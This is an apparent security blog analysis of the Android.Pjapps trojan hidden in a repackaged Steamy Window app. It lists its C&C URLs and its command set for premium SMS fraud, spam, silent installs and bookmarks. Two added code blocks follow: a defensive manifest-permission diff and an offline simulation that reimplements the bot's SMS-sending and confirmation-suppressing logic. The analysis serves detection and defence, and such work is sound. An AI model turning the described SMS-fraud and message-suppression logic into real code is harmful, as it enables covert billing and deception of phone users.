Android Threats Getting Steamy

As seen in recent blog postings, Android malware is on the rise. Android.Pjapps is another example of a Trojan with back door capabilities that targets Android devices. As with previous Android threats, it spreads through repackaged copies of legitimate applications that are distributed on unregulated third-party Android marketplaces.

We have detected a few applications carrying Android.Pjapps code. One of these applications is Steamy Window. As with other trojanized Android applications, it is difficult to differentiate the legitimate version from the malicious one once it is installed. During installation, however, the malicious version can be identified by the excessive permissions it requests. The images below show the installation process of a clean Steamy Window application and a malicious one.

When run, both the legitimate and malicious version of the application mimic a steam effect on your Android device’s screen. It even lets you wipe it off with your finger as seen in the image below:

However, the malicious version adds functionality of its own. The screenshot below shows how the original application's manifest has been changed:
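The permission check the post recommends doing by eye at install time can be done mechanically against a decoded manifest. The following is an added example, not code from the original post or from the Steamy Window author: it parses two AndroidManifest.xml files and reports what the suspect one declares beyond the clean one. Both manifests are constructed for illustration. The permission names and the SMS_RECEIVED action are real Android identifiers, but which permissions the genuine Steamy Window declares, and the .BackgroundService and .SmsReceiver component names, are assumptions rather than findings from the actual sample.

```python
"""Added example (not from the original post): compare the permissions and
components declared by a clean and a repackaged AndroidManifest.xml.

Both manifests are constructed. Which permissions the real Steamy Window
declares, and the component names, are assumptions for this example.
"""
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"  # attribute namespace

CLEAN_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.steamywindow">
  <uses-permission android:name="android.permission.VIBRATE"/>
  <application android:label="Steamy Window">
    <activity android:name=".MainActivity"/>
  </application>
</manifest>
"""

TROJANIZED_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.steamywindow">
  <uses-permission android:name="android.permission.VIBRATE"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="com.android.browser.permission.WRITE_HISTORY_BOOKMARKS"/>
  <application android:label="Steamy Window">
    <activity android:name=".MainActivity"/>
    <service android:name=".BackgroundService"/>
    <receiver android:name=".SmsReceiver">
      <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Permissions matching the capabilities the post attributes to Pjapps (SMS
# sending and interception, C&C traffic, IMEI access, installs, bookmarks).
# None of them is needed to draw steam on the screen.
SUSPICIOUS = {
    "android.permission.INTERNET",
    "android.permission.SEND_SMS",
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS",
    "android.permission.READ_PHONE_STATE",
    "android.permission.INSTALL_PACKAGES",
    "com.android.browser.permission.WRITE_HISTORY_BOOKMARKS",
}


def parse_manifest(xml_text):
    """Return the permissions, components and intent actions a manifest declares."""
    root = ET.fromstring(xml_text)
    return {
        "permissions": {e.get(ANDROID + "name") for e in root.iter("uses-permission")},
        "components": {kind: {e.get(ANDROID + "name") for e in root.iter(kind)}
                       for kind in ("activity", "service", "receiver")},
        "actions": {e.get(ANDROID + "name") for e in root.iter("action")},
    }


def suspicious_permissions(xml_text):
    """Triage a single manifest when no known-good copy is available."""
    return sorted(parse_manifest(xml_text)["permissions"] & SUSPICIOUS)


def diff_manifests(clean_xml, suspect_xml):
    """Report what the suspect manifest declares beyond the clean one."""
    clean, suspect = parse_manifest(clean_xml), parse_manifest(suspect_xml)
    added = suspect["permissions"] - clean["permissions"]
    added_components = {kind: suspect["components"][kind] - clean["components"][kind]
                        for kind in clean["components"]}
    return {
        "added_permissions": sorted(added),
        "suspicious_permissions": sorted(added & SUSPICIOUS),
        "added_components": {k: sorted(v) for k, v in added_components.items() if v},
        "added_actions": sorted(suspect["actions"] - clean["actions"]),
    }


if __name__ == "__main__":
    # In practice the two manifests would be read from disk after decoding.
    for key, value in diff_manifests(CLEAN_MANIFEST, TROJANIZED_MANIFEST).items():
        print(f"{key}: {value}")
```

The manifest inside an APK is stored as binary XML, so it has to be decoded first (for example with `apktool d`) before it can be fed to this script. The single-manifest triage is the weaker check: an application that legitimately needs SEND_SMS will trip it, whereas the diff against a known-good copy of the same package pinpoints exactly what the repackager added.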

The aim of Android.Pjapps is to build a botnet controlled by a number of different Command and Control (C&C) servers. Among other things, it is able to install applications, navigate to websites, add bookmarks to your browser, send text messages, and optionally block text message responses.
The threat registers its own service so that it can operate in the background without the user noticing. The service is started whenever the signal strength of the infected phone changes, which gives it a frequent and innocuous trigger, and it then tries to connect to the following C&C server to register the infection:

http://mobile.meego91.com/mm.do?..{parameters}

Along with this request, it sends sensitive information obtained from the device, including:

It then waits for a response and, if instructed, sends a text message containing the infected device's IMEI number to a mobile number obtained from the following URL:

http://log.meego91.com:9033/android.log?{parameters}

This mobile number is meant to be controlled by the attacker. Because it is fetched at runtime rather than hardcoded in the sample, the attacker can change it at any time and keeps it out of the analyst's reach, hiding his identity within the "cloud".

The malicious service also periodically checks the C&C server using the URL below to pull down commands:

http://xml.meego91.com:8118/push/newandroidxml/...

Android.Pjapps uses an XML-based protocol that defines tasks (or commands) to be performed at given times. It supports the following commands:

note
This command is most probably meant to be used to send text messages to premium-rate numbers. A mobile number and content have to be specified, and two additional actions can be performed:

  • blacklisting—If specified, the mobile's number is sent to a remote server to check whether it has been blacklisted, in which case the message is not sent. The URL of the service is passed as a parameter to the command, and the blacklist check is performed by issuing a request with the following format:

    ($blacklist_url) + "/?tel=" + mobilenumber
     

  • response blocking—Android.Pjapps also listens for incoming messages. This allows the note command to specify rules for dropping inbound messages when certain conditions are met, so that the user never reads them (such as the confirmation a premium-rate service sends back). Beginning and end-of-message strings are among the supported filters.

push
This command performs SMS-spamming and requires the following parameters:

  • <smscontent>—Content of the text message
  • <smsurl>—A URL to add at the end of the message contents
  • <tel>—Mobile numbers to send the text to, separated by '#'

It also supports a blacklist check, in this case keyed on the infected device's IMEI rather than its phone number. The check is performed by issuing the following request:

($blacklist_url) + "/sim?=" + imei
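To make the note and push mechanics above concrete, here is an added example that re-creates both tasks offline with a stand-in blacklist server, so that both sides of the exchange are visible. It is not code from the original post and not the malware's own code. From the post it takes only the command names, the <smscontent>, <smsurl> and <tel> parameters, the '#' separator, and the two blacklist request formats ("/?tel=" + number and "/sim?=" + imei). Everything else is assumed for illustration: the <tasks>/<task> envelope, the <content>, <blacklist> and <block> elements, the "1"/"0" reply convention, the decision to install the drop rules regardless of the blacklist outcome, and the numbers, IMEI and hostnames.

```python
"""Added example (not from the original post): offline re-creation of the
note and push tasks with a fake blacklist server.

Only the command names, the <smscontent>/<smsurl>/<tel> parameters, the '#'
separator and the two blacklist URL formats come from the post; the XML
envelope, element names, reply convention and all sample values are assumed.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed task document in the assumed layout.
TASKS_XML = """\
<tasks>
  <task type="note">
    <tel>10086</tel>
    <content>KTDX</content>
    <blacklist>http://bl.example.invalid</blacklist>
    <block begin="Subscription" end="STOP"/>
  </task>
  <task type="push">
    <smscontent>Free ringtones: </smscontent>
    <smsurl>http://dl.example.invalid/r.apk</smsurl>
    <tel>13800000001#13800000002#13800000003</tel>
    <blacklist>http://bl.example.invalid</blacklist>
  </task>
</tasks>
"""


class FakeBlacklistServer:
    """Stands in for the attacker's blacklist service and records every request."""

    def __init__(self, numbers=(), imeis=()):
        self.numbers, self.imeis, self.requests = set(numbers), set(imeis), []

    def get(self, url):
        self.requests.append(url)
        parts = urlsplit(url)
        if parts.path == "/" and parts.query.startswith("tel="):
            return "1" if parts.query[4:] in self.numbers else "0"
        if parts.path == "/sim" and parts.query.startswith("="):
            # "/sim?=" + imei leaves the IMEI as the value of an empty query key
            return "1" if parts.query[1:] in self.imeis else "0"
        return "0"


class PjappsLikeBot:
    def __init__(self, phone_number, imei, http_get, send_sms):
        self.phone_number, self.imei = phone_number, imei
        self.http_get, self.send_sms = http_get, send_sms
        self.drop_rules = []  # (begin, end) filters installed by note tasks
        self.dropped = []

    def run_tasks(self, xml_text):
        for task in ET.fromstring(xml_text).iter("task"):
            if task.get("type") == "note":
                self.handle_note(task)
            elif task.get("type") == "push":
                self.handle_push(task)  # soft/window/mark are not modelled here

    def handle_note(self, task):
        # Assumption: filters are installed whether or not the message is sent.
        for rule in task.findall("block"):
            self.drop_rules.append((rule.get("begin", ""), rule.get("end", "")))
        blacklist = task.findtext("blacklist")
        if blacklist and self.http_get(blacklist + "/?tel=" + self.phone_number) == "1":
            return  # handset already on the attacker's list: do not bill it again
        self.send_sms(task.findtext("tel"), task.findtext("content", ""))

    def handle_push(self, task):
        blacklist = task.findtext("blacklist")
        if blacklist and self.http_get(blacklist + "/sim?=" + self.imei) == "1":
            return
        body = task.findtext("smscontent", "") + task.findtext("smsurl", "")
        for tel in filter(None, task.findtext("tel", "").split("#")):
            self.send_sms(tel, body)

    def on_incoming_sms(self, sender, body):
        """True if the message reaches the user. On Android 2.x a high-priority
        SMS_RECEIVED receiver would call abortBroadcast() in the False case."""
        for begin, end in self.drop_rules:
            if body.startswith(begin) and body.endswith(end):
                self.dropped.append((sender, body))
                return False
        return True


def simulate(imei_blacklisted=True):
    """Constructed scenario: the handset's number is never blacklisted; its IMEI
    is, unless imei_blacklisted is False."""
    server = FakeBlacklistServer(imeis={"356938035643809"} if imei_blacklisted else ())
    sent = []
    bot = PjappsLikeBot("13900000000", "356938035643809", server.get,
                        lambda tel, body: sent.append((tel, body)))
    bot.run_tasks(TASKS_XML)
    inbound = [("10086", "Subscription to KTDX confirmed. To cancel reply STOP"),
               ("13700000000", "Dinner at 7?")]
    shown = [m for m in inbound if bot.on_incoming_sms(*m)]
    return {"sent": sent, "requests": server.requests,
            "dropped": bot.dropped, "shown": shown}


if __name__ == "__main__":
    for key, value in simulate().items():
        print(f"{key}: {value}")
```

Two things stand out when running it. The note and push checks are keyed on different identifiers (phone number versus IMEI), so a proxy or IDS rule watching for `GET /?tel=` and `GET /sim?=` requests to the same host would see the same handset identified both ways. And the drop rule silently swallows the premium service's confirmation while unrelated messages still get through, which is exactly why the victim does not notice the subscription until the bill arrives.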

soft
This command is used to install packages on to the compromised device. The packages are downloaded from a remote URL that has to be sent along with the command as a parameter.

window
This command makes the phone navigate to a given website. Android.Pjapps has an order of preference for which browser to use, checking for the presence of the following browser packages:

  • com.uc.browser
  • com.tencent.mtt
  • com.opera.mini.android
  • mobi.mgeek.TunnyBrowser
  • com.skyfire.browser
  • com.kolbysoft.steel
  • com.android.browser

mark
The mark command is used to add bookmarks to the compromised device. When the service is first launched, Android.Pjapps may also, by default, add the following bookmarks to the device:

  • android.paojiao.cn
  • ct2.paojiao.cn
  • g3g3.cn

xbox
This command appears in the Android.Pjapps parsing code, but it seems to be unimplemented.

None of the domains listed above seem to be active at the moment, so we haven’t had the chance to inspect the traffic between Android.Pjapps and its C&C servers. However, looking at the threat’s capabilities we believe it has been designed to push advertisement campaigns and to reap the benefits from compromised devices using third-party, premium-rate services.

To avoid becoming a victim of such malicious Android applications, we recommend that you only use regulated Android marketplaces for downloading and installing Android applications. Also, the "Unknown sources" option in the Android application settings controls whether non-market applications can be installed at all; leaving it disabled helps to prevent this type of attack. Checking user comments on the marketplace can also assist in determining whether an application is safe. Lastly, always check the permissions being requested during the installation of any Android application. If they seem excessive for what the application is designed to do, it would be wise to stop installing it.